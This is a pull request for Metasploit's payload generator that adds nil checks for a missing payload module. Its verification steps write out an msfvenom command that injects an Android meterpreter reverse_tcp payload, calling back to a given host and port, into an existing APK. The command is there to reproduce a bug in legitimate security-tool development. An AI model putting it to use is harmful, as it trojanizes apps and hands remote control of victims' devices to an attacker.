### PR TITLE
Update payload_generator.rb to properly check if payload_module is nil

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -362,6 +362,7 @@ module Msf
     # produce a JAR or WAR file for the java payload.
     # @return [String] Java payload as a JAR or WAR file
     def generate_java_payload
+      raise PayloadGeneratorError, "A payload module was not selected" if payload_module.nil?
       payload_module.datastore.import_options_from_hash(datastore)
       case format
       when "raw", "jar"
@@ -460,6 +461,7 @@ module Msf
         end
         stdin
       else
+        raise PayloadGeneratorError, "A payload module was not selected" if payload_module.nil?
         chosen_platform = choose_platform(payload_module)
         if chosen_platform.platforms.empty?
           raise IncompatiblePlatform, "The selected platform is incompatible with the payload"


### PR DESCRIPTION
This fixes #13156 by fixing up the code of `lib/msf/core/payload_generator.rb` so that if the `payload_module` global variable is `nil`, an exception is raised. This prevents potential `nil` reference errors like the one mentioned in #13156.

## Verification

List the steps needed to make sure this thing works

Before patch:
- [x] Run: `./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.187 LPORT=1234 -e x86/shikata_ga_nai -i 2 R -x ./Terminus.apk -k | ./msfvenom -a java --platform android -e x86/jmp_call_additive -i 3 -o ./terminus3.apk`
- [x] **Verify** that you see the message `Error: undefined method 'datastore' for nil:NilClass`

After patch:
- [x] Run: `./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.187 LPORT=1234 -e x86/shikata_ga_nai -i 2 R -x ./Terminus.apk -k | ./msfvenom -a java --platform android -e x86/jmp_call_additive -i 3 -o ./terminus3.apk`
- [x] **Verify** that you see the message `Error: A payload module was not selected`